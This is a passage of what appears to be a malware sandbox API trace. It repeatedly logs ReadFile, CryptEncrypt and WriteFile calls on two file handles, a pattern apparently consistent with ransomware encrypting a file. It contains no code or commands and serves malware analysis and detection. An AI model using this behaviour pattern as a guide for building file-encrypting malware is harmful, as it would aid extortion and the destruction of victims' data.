nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.168] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.168] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.169] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.169] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.169] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.169] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.169] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.169] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.170] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.171] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.171] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.171] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.171] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.171] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.171] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.171] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.171] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.171] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.171] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.171] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.172] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.172] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.172] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.172] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.173] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.173] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.173] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.173] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.174] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.174] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.174] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.174] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.174] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.175] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.175] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.175] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.175] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.175] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.175] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.176] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.176] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.176] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.176] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.176] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.176] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.176] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.176] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.176] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, 